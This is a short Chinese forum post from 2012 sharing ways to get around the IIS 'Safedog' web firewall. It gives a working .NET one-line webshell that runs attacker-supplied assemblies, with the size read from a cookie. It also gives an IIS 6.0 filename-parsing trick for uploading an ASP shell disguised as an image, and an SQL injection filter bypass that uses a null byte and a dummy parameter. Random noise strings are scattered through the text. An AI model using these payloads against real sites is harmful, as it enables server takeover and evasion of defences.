1、绕过IIS安全狗的一句话。) U# u& ?! X8 y3 ?- K( P
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。6 Q) n' \* S' d, E# O8 O
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。3 c N4 h9 U7 S& m, k
7 o# ~& Q) l7 u6 [' }. u; a$ o
2、IIS6.0解析漏洞遇到安全狗。
9 m+ b! w) r4 j' _9 d4 W文件名为- D* e3 H% @* G
http://www.xxxxx.com/sh3llc0de.asp;1.jpg) O, I4 x V. L4 @
/ x# Y: S# e: i" u3 D5 r8 \
这样的会被IIS安全狗果断屏蔽。
0 u9 T, a2 G8 k改成如下名称,IIS6一样会解析:5 r' J4 v A3 Q! V# O0 W' f
www.xxxxx.com/;1.asp;1.jpg
+ W* c. ?' P& k+ `1 a, T$ J$ m+ B! x7 B- m7 L- e' o5 o* V
3、安全狗的注入绕过。, G6 N0 D0 w: z3 n
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。5 h3 g+ V5 j: {6 I( e8 E2 D
但如果:/ ]( ?' c7 X% a' [" @$ j/ E
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1* d# I0 n+ r. D0 f6 w A
就可以成功绕过了。5 a1 C* m$ T% _
" Y* x! [& d4 L# V7 i) ?( D$ A1 x) V2 L7 k! N
|
发表于 2012-10-31 08:25:30
收藏
支持
反对